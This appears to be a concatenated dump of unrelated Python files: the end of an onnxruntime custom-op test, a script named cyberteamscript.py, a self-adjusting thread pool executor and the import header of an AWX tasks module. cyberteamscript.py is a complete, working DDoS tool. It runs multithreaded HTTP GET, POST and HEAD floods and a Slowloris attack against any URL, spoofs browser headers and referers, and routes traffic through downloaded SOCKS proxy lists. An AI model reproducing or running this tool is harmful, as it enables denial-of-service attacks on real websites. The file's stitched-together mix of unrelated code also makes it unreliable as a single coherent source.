input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
if __name__ == '__main__':
unittest.main()
|
cyberteamscript.py
|
#!/usr/bin/python3
#Coded by Vesah
#########################################
# Fist Version private script #
# Vesah lover
# #
#########################################
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
print ('''
. =======
/ \| O O |
\ / \`___'/
# _| |_
(#) ( )
#\//|* *|\\
#\/( * )/
# =====
# ( U )
# || ||
.#---'| |`----.
`#----' `-----'
>--------------------------------------------->
Version 1.0.0
Dev by Vesah
┌─────────────────────────────────────────────┐
│ Tos: N'attaque pas les .gov websites │
├─────────────────────────────────────────────┤
│ Amélioration : │
│ [+] Optimization │
│ [+] Changed Output │
│ [+] Added Url Parser │
├─────────────────────────────────────────────┤
│ By Vesah │ CyberTeam |
└─────────────────────────────────────────────┘''')
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
"https://www.fbi.com/",
"https://www.bing.com/search?q=",
"https://r.search.yahoo.com/",
"https://www.cia.gov/index.html",
"https://vk.com/profile.php?redirect=",
"https://www.usatoday.com/search/results?q=",
"https://help.baidu.com/searchResult?keywords=",
"https://steamcommunity.com/market/search?q=",
"https://www.ted.com/search?q=",
"https://play.google.com/store/search?q=",
"https://www.qwant.com/search?q=",
"https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=",
"https://www.google.ad/search?q=",
"https://www.google.ae/search?q=",
"https://www.google.com.af/search?q=",
"https://www.google.com.ag/search?q=",
"https://www.google.com.ai/search?q=",
"https://www.google.al/search?q=",
"https://www.google.am/search?q=",
"https://www.google.co.ao/search?q=",
]
ind_dict = {}
data = ""
cookies = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
###################################################
Intn = random.randint
Choice = random.choice
###################################################
def build_threads(mode,thread_num,event,socks_type,ind_rlock):
if mode == "post":
for _ in range(thread_num):
th = threading.Thread(target = post,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "cc":
for _ in range(thread_num):
th = threading.Thread(target = cc,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "head":
for _ in range(thread_num):
th = threading.Thread(target = head,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
def getuseragent():
platform = Choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = Choice(['68K', 'PPC', 'Intel Mac OS X'])
elif platform == 'Windows':
os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64'])
elif platform == 'X11':
os = Choice(['Linux i686', 'Linux x86_64'])
browser = Choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(Intn(500, 599))
version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
elif browser == 'firefox':
currentYear = datetime.date.today().year
year = str(Intn(2020, currentYear))
month = Intn(1, 12)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
day = Intn(1, 30)
if day < 10:
day = '0' + str(day)
else:
day = str(day)
gecko = year + month + day
version = str(Intn(1, 72)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
elif browser == 'ie':
version = str(Intn(1, 99)) + '.0'
engine = str(Intn(1, 99)) + '.0'
option = Choice([True, False])
if option == True:
token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
else:
token = ''
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def randomurl():
return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings))
def GenReqHeader(method):
header = ""
if method == "get" or method == "head":
connection = "Connection: Keep-Alive\r\n"
if cookies != "":
connection += "Cookies: "+str(cookies)+"\r\n"
accept = Choice(acceptall)
referer = "Referer: "+Choice(referers)+ target + path + "\r\n"
useragent = "User-Agent: " + getuseragent() + "\r\n"
header = referer + useragent + accept + connection + "\r\n"
elif method == "post":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-requested-with:XMLHttpRequest\r\n"
refer = "Referer: http://"+ target + path + "\r\n"
user_agent = "User-Agent: " + getuseragent() + "\r\n"
accept = Choice(acceptall)
if mode2 != "y":# You can enable customize data
data = str(random._urandom(16))
length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n"
if cookies != "":
length += "Cookies: "+str(cookies)+"\r\n"
header = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
return header
def ParseUrl(original_url):
global target
global path
global port
global protocol
original_url = original_url.strip()
url = ""
path = "/"#default value
port = 80 #default value
protocol = "http"
#http(s)://www.example.com:1337/xxx
if original_url[:7] == "http://":
url = original_url[7:]
elif original_url[:8] == "https://":
url = original_url[8:]
protocol = "https"
#http(s)://www.example.com:1337/xxx ==> www.example.com:1337/xxx
#print(url) #for debug
tmp = url.split("/")
website = tmp[0]#www.example.com:1337/xxx ==> www.example.com:1337
check = website.split(":")
if len(check) != 1:#detect the port
port = int(check[1])
else:
if protocol == "https":
port = 443
target = check[0]
if len(tmp) > 1:
path = url.replace(website,"",1)#get the path www.example.com/xxx ==> /xxx
def InputOption(question,options,default):
ans = ""
while ans == "":
ans = str(input(question)).strip().lower()
if ans == "":
ans = default
elif ans not in options:
print("> Please enter the correct option")
ans = ""
continue
return ans
def CheckerOption():
global proxies
N = str(input("> Do you need to get socks list?(y/n,default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=1):"))
if ms == "":
ms = int(1)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
def SetupIndDict():
global ind_dict
for proxy in proxies:
ind_dict[proxy.strip()] = 0
def OutputToScreen(ind_rlock):
global ind_dict
i = 0
sp_char = ["|","/","-","\\"]
while 1:
if i > 3:
i = 0
print("{:^70}".format("Proxies attacking status"))
print("{:^70}".format("IP:PORT <-> RPS "))
#1. xxx.xxx.xxx.xxx:xxxxx ==> Rps: xxxx
ind_rlock.acquire()
top10 = sorted(ind_dict, key=ind_dict.get, reverse=True)
for num in range(10):
top = "none"
rps = 0
if len(ind_dict) != 0:
top = top10[num]
rps = ind_dict[top]
ind_dict[top] = 0
print("{:^70}".format("{:2d}. {:^22s} | Rps: {:d}".format(num+1,top,rps)))
total = 0
for k,v in ind_dict.items():
total = total + v
ind_dict[k] = 0
ind_rlock.release()
print("{:^70}".format(" ["+sp_char[i]+"] CC attack | Total Rps:"+str(total)))
i+=1
time.sleep(1)
print("\n"*100)
def cc(event,socks_type,ind_rlock):
global ind_dict
header = GenReqHeader("get")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for _ in range(multiple+1):
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
def head(event,socks_type,ind_rlock):#HEAD MODE
global ind_dict
header = GenReqHeader("head")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for _ in range(multiple+1):
head_host = "HEAD " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
sent = s.send(str.encode(request))
if not sent:
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:#dirty fix
s.close()
def post(event,socks_type,ind_rlock):
global ind_dict
request = GenReqHeader("post")
proxy = Choice(proxies).strip().split(":")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if str(port) == '443': # //AUTO Enable SSL MODE :)
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for _ in range(multiple+1):
sent = s.send(str.encode(request))
if not sent:
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
socket_list=[]
def slow(conn,socks_type):
proxy = Choice(proxies).strip().split(":")
for _ in range(conn):
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
while True:
for s in list(socket_list):
try:
s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8"))
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
socket_list.remove(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
proxy = Choice(proxies).strip().split(":")
for _ in range(conn - len(socket_list)):
try:
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if int(port) == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
proxy = Choice(proxies).strip().split(":")
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
pass
nums = 0
def checking(lines,socks_type,ms,rlock,):#Proxy checker coded by Leeon123
global nums
global proxies
proxy = lines.strip().split(":")
if len(proxy) != 2:
rlock.acquire()
proxies.remove(lines)
rlock.release()
return
err = 0
while True:
if err == 3:
rlock.acquire()
proxies.remove(lines)
rlock.release()
break
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(ms)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
sent = s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
if not sent:
err += 1
s.close()
break
except:
err +=1
nums += 1
def check_socks(ms):#Coded by Leeon123
global nums
thread_list=[]
rlock = threading.RLock()
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking,args=(lines,5,ms,rlock,))
th.start()
if choice == "4":
th = threading.Thread(target=checking,args=(lines,4,ms,rlock,))
th.start()
thread_list.append(th)
time.sleep(0.01)
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
for th in list(thread_list):
th.join()
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies)))
ans = input("> Do u want to save them in a file? (y/n, default=y)")
if ans == "y" or ans == "":
if choice == "4":
with open("socks4.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks4.txt.")
elif choice == "5":
with open("socks5.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks5.txt.")
def check_list(socks_file):
print("> Checking list")
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i,encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
if choice == "4":
f = open("socks4.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
try:#credit to All3xJ
r = requests.get("https://www.socks-proxy.net/",timeout=5)
part = str(r.content)
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("socks4.txt","a")
out_file.write(proxies)
out_file.close()
except:
pass
print("> Have already downloaded socks4 list as socks4.txt")
if choice == "5":
f = open("socks5.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5",timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks5",timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
print("> Have already downloaded socks5 list as socks5.txt")
def main():
global multiple
global choice
global data
global mode2
global cookies
global brute
print("> Mode: [cc/post/head/slow/check]")
mode = InputOption("> Choose Your Mode (default=cc) :",["cc","post","head","slow","check"],"cc")
url = str(input("> Input the target url:")).strip()
ParseUrl(url)
if mode == "post":
mode2 = InputOption("> Customize post data? (y/n, default=n):",["y","n","yes","no"],"n")
if mode2 == "y":
data = open(input("> Input the file's path:").strip()).readlines()
data = ' '.join([str(txt) for txt in data])
choice2 = InputOption("> Customize cookies? (y/n, default=n):",["y","n","yes","no"],"n")
if choice2 == "y":
cookies = str(input("Plese input the cookies:")).strip()
choice = InputOption("> Choose your socks mode(4/5, default=5):",["4","5"],"5")
if choice == "4":
socks_type = 4
else:
socks_type = 5
if mode == "check":
CheckerOption()
print("> End of process")
return
if mode == "slow":
thread_num = str(input("> Connections(default=400):"))
else:
thread_num = str(input("> Threads(default=400):"))
if thread_num == "":
thread_num = int(400)
else:
try:
thread_num = int(thread_num)
except:
sys.exit("Error thread number")
CheckerOption()
ind_rlock = threading.RLock()
if mode == "slow":
input("Press Enter to continue.")
th = threading.Thread(target=slow,args=(thread_num,socks_type,))
th.setDaemon(True)
th.start()
else:
multiple = str(input("> Input the Magnification(default=100):"))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
brute = str(input("> Enable boost mode[beta](y/n, default=n):"))
if brute == "":
brute = False
elif brute == "y":
brute = True
elif brute == "n":
brute = False
event = threading.Event()
print("> Building threads...")
SetupIndDict()
build_threads(mode,thread_num,event,socks_type,ind_rlock)
event.clear()
input("Press Enter to continue.")
event.set()
threading.Thread(target=OutputToScreen,args=(ind_rlock,),daemon=True).start()
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
if __name__ == "__main__":
main()#Coded by Vesah #CyberTeam
|
custom_threadpool_executor.py
|
"""
可自动实时调节线程数量的线程池。
比官方ThreadpoolExecutor的改进是
1.有界队列
2.实时调节线程数量,指的是当任务很少时候会去关闭很多线程。官方ThreadpoolExecurot只能做到忙时候开启很多线程,但不忙时候线程没有关闭线程。
linux系统能承受的线程总数有限,一般不到2万。
"""
import atexit
import queue
import sys
import threading
import time
import weakref
from function_scheduling_distributed_framework.utils import LoggerMixin, nb_print, LoggerLevelSetterMixin, LogManager
from function_scheduling_distributed_framework.concurrent_pool.custom_evenlet_pool_executor import check_evenlet_monkey_patch
from function_scheduling_distributed_framework.concurrent_pool.custom_gevent_pool_executor import check_gevent_monkey_patch
_shutdown = False
_threads_queues = weakref.WeakKeyDictionary()
def _python_exit():
global _shutdown
_shutdown = True
items = list(_threads_queues.items())
for t, q in items:
q.put(None)
for t, q in items:
t.join()
atexit.register(_python_exit)
class _WorkItem(LoggerMixin):
def __init__(self, fn, args, kwargs):
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
# noinspection PyBroadException
try:
self.fn(*self.args, **self.kwargs)
except BaseException as exc:
self.logger.exception(f'函数 {self.fn.__name__} 中发生错误,错误原因是 {type(exc)} {exc} ')
def __str__(self):
return f'{(self.fn.__name__, self.args, self.kwargs)}'
def check_not_monkey():
if check_gevent_monkey_patch(raise_exc=False):
raise Exception('请不要打gevent包的补丁')
if check_evenlet_monkey_patch(raise_exc=False):
raise Exception('请不要打evenlet包的补丁')
class CustomThreadPoolExecutor(LoggerMixin, LoggerLevelSetterMixin):
def __init__(self, max_workers=None, thread_name_prefix=''):
"""
最好需要兼容官方concurren.futures.ThreadPoolExecutor 和改版的BoundedThreadPoolExecutor,入参名字和个数保持了一致。
:param max_workers:
:param thread_name_prefix:
"""
self._max_workers = max_workers or 4
self._min_workers = 5
self._thread_name_prefix = thread_name_prefix
self.work_queue = queue.Queue(max_workers)
# self._threads = set()
self._threads = weakref.WeakSet()
self._lock_compute_threads_free_count = threading.Lock()
self.threads_free_count = 0
self._shutdown = False
self._shutdown_lock = threading.Lock()
def set_min_workers(self, min_workers=10):
self._min_workers = min_workers
return self
def change_threads_free_count(self, change_num):
with self._lock_compute_threads_free_count:
self.threads_free_count += change_num
def submit(self, func, *args, **kwargs):
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('不能添加新的任务到线程池')
self.work_queue.put(_WorkItem(func, args, kwargs))
self._adjust_thread_count()
def _adjust_thread_count(self):
# if len(self._threads) < self._threads_num:
self.logger.debug((self.threads_free_count, len(self._threads), len(_threads_queues), get_current_threads_num()))
if self.threads_free_count < self._min_workers and len(self._threads) < self._max_workers:
# t = threading.Thread(target=_work,
# args=(self._work_queue,self))
t = _CustomThread(self).set_log_level(self.logger.level)
t.setDaemon(True)
t.start()
self._threads.add(t)
_threads_queues[t] = self.work_queue
def shutdown(self, wait=True):
with self._shutdown_lock:
self._shutdown = True
self.work_queue.put(None)
if wait:
for t in self._threads:
t.join()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown(wait=True)
return False
class _CustomThread(threading.Thread, LoggerMixin, LoggerLevelSetterMixin):
def __init__(self, executorx: CustomThreadPoolExecutor):
super().__init__()
self._executorx = executorx
self._run_times = 0
# noinspection PyProtectedMember
def _remove_thread(self, stop_resson=''):
# noinspection PyUnresolvedReferences
self.logger.debug(f'停止线程 {self._ident}, 触发条件是 {stop_resson} ')
self._executorx.change_threads_free_count(-1)
self._executorx._threads.remove(self)
_threads_queues.pop(self)
# noinspection PyProtectedMember
def run(self):
# noinspection PyUnresolvedReferences
self.logger.debug(f'新启动线程 {self._ident} ')
self._executorx.change_threads_free_count(1)
while True:
try:
work_item = self._executorx.work_queue.get(block=True, timeout=60)
except queue.Empty:
# continue
# self._remove_thread()
# break
if self._executorx.threads_free_count > self._executorx._min_workers:
self._remove_thread(f'当前线程超过60秒没有任务,线程池中不在工作状态中的线程数量是 {self._executorx.threads_free_count},超过了指定的数量 {self._executorx._min_workers}')
break # 退出while 1,即是结束。这里才是决定线程结束销毁,_remove_thread只是个名字而已,不是由那个来销毁线程。
else:
continue
# nb_print(work_item)
if work_item is not None:
self._executorx.change_threads_free_count(-1)
work_item.run()
del work_item
self._executorx.change_threads_free_count(1)
continue
if _shutdown or self._executorx._shutdown:
self._executorx.work_queue.put(None)
break
process_name_set = set()
logger_show_current_threads_num = LogManager('show_current_threads_num').get_logger_and_add_handlers(formatter_template=5, log_filename='show_current_threads_num.log', do_not_use_color_handler=True)
def show_current_threads_num(sleep_time=60, process_name='', block=False):
process_name = sys.argv[0] if process_name == '' else process_name
def _show_current_threads_num():
while True:
# logger_show_current_threads_num.info(f'{process_name} 进程 的 并发数量是 --> {threading.active_count()}')
nb_print(f'{process_name} 进程 的 线程数量是 --> {threading.active_count()}')
time.sleep(sleep_time)
if process_name not in process_name_set:
if block:
_show_current_threads_num()
else:
t = threading.Thread(target=_show_current_threads_num, daemon=True)
t.start()
process_name_set.add(process_name)
def get_current_threads_num():
return threading.active_count()
if __name__ == '__main__':
from function_scheduling_distributed_framework.utils import decorators
from function_scheduling_distributed_framework.concurrent_pool.bounded_threadpoolexcutor import BoundedThreadPoolExecutor
# @decorators.keep_circulating(1)
def f1(a):
time.sleep(0.2)
nb_print(f'{a} 。。。。。。。')
# raise Exception('抛个错误测试')
# show_current_threads_num()
pool = CustomThreadPoolExecutor(200).set_log_level(10).set_min_workers()
# pool = BoundedThreadPoolExecutor(200) # 测试对比原来写的BoundedThreadPoolExecutor
show_current_threads_num(sleep_time=5)
for i in range(300):
time.sleep(0.3) # 这里的间隔时间模拟,当任务来临不密集,只需要少量线程就能搞定f1了,因为f1的消耗时间短,不需要开那么多线程,CustomThreadPoolExecutor比BoundedThreadPoolExecutor 优势之一。
pool.submit(f1, str(i))
nb_print(6666)
# pool.shutdown(wait=True)
pool.submit(f1, 'yyyy')
# 下面测试阻塞主线程退出的情况。注释掉可以测主线程退出的情况。
while True:
time.sleep(10)
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now, timedelta
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
